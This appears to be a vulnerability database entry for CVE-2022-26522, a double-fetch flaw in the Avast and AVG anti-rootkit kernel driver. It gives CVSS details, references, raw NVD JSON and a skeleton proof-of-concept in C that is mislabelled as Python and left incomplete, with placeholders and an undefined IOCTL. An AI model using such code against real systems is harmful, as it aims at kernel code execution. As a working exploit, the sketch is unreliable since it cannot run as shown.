CVE-2022-26522

Description

The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xc4a3.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Avast Windows Anti Rootkit Driver < 22.1

AVG Windows Anti Rootkit Driver < 22.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC Concept for CVE-2022-26522 (Double Fetch)
// This is a simplified structure to demonstrate the race condition.
#include <Windows.h>
#include <stdio.h>

HANDLE hDevice;
volatile BOOL bShouldFlip = FALSE;

DWORD WINAPI FlipThread(LPVOID lpParam) {
    while (TRUE) {
        if (bShouldFlip) {
            // Modify the shared buffer to exploit the double fetch
            // (Simulating changing size/content between driver reads)
            bShouldFlip = FALSE;
        }
    }
    return 0;
}

int main() {
    // Open handle to the vulnerable driver
    hDevice = CreateFileA("\\\\.\\aswArPot", ...);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device\n");
        return 1;
    }

    // Start thread to race with the driver
    HANDLE hThread = CreateThread(NULL, 0, FlipThread, NULL, 0, NULL);

    // Trigger the vulnerability via IOCTL/Socket communication
    // The driver fetches data here -> Thread flips data -> Driver fetches again
    bShouldFlip = TRUE;
    DeviceIoControl(hDevice, IOCTL_VULNERABLE_FUNC, ...);

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-26522
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-26522
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-26522/
[4] VulDB https://vuldb.com/cve/CVE-2022-26522
[5] https://www.avast.com/bug-bounty
[6] https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-26522", "sourceIdentifier": "[email protected]", "published": "2026-05-08T05:16:08.893", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The socket connection handler in aswArPot.sys in the Avast and AVG Windows Anti Rootkit driver before 22.1 allows local attackers to execute arbitrary code in kernel mode or cause a denial of service (memory corruption and OS crash) due to a double fetch vulnerability at aswArPot+0xc4a3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "references": [{"url": "https://www.avast.com/bug-bounty", "source": "[email protected]"}, {"url": "https://www.sentinelone.com/labs/vulnerabilities-in-avast-and-avg-put-millions-at-risk/", "source": "[email protected]"}]}}